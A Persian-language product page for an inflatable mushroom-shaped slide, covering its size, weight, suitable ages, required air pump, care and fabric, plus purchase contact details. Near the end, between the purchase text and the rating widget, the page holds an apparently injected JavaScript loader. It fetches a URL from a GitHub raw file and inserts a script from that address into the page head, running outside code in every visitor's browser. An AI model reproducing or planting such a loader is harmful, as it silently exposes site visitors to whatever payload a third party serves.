سرسره بادی قارچی

 • سرسره طرح قارچی، یک قصر بادی مناسب محیط های مختلف بسته به ابعاد و اندازه است. این سرسره بادی دارای ویژگی های مثبت زیادی است. طراحان ما تم ( رنگ بندی ) این سرسره را بر اساس روانشناسی رنگ طراحی کردن . هر دستگاه رنگ بندی خاص خودش را دارد . این سرسره بر اساس رنگ بندی جذابی برای کودک طراحی شده که برای جذب کودکان است . این سرسره داری دو مناره با کله قارچ است که با یک کمان به هم متصل شده اند.

  سرسره بادی قارچی

  ابعاد و اندازه سرسره بادی قارچی وزن این سرسره ۱۰۰ کیلوگرم، طول این قصر بادی ۵ متر و عرض آن ۳.۵ متر می باشد. همچنین ارتفاع این سرسره ۴ متر است. بنابرین شما می توانید از این سرسره در محیط های سربسته کوچک مانند مهدکودک ها و شهر بازی های سر پوشیده به شرط ارتفاع بالاتر استفاده نمایید. لوازم جانبی این قصر بادی نیازمند یک پمپ هوا (دمنده باد) نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است. نحوه نگهداری و درجه سنی این سرسره مناسب سنین ۴ تا ۱۲ سال می باشد که در مهد کودک ها کاربرد بسیار بالایی دارد. همچنین این سرسره بادی به شرایط بد آب و هوایی حساس است بنابرین دوری از رطوبت و گرمای آفتاب می تواند به طول عمر سرسره شما اضافه کند. جنس پارچه و دوخت پارچه این سرسره از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.

  نحوه خرید سرسره بادی قارچی

  این قصر بادی تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره بادی قارچی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید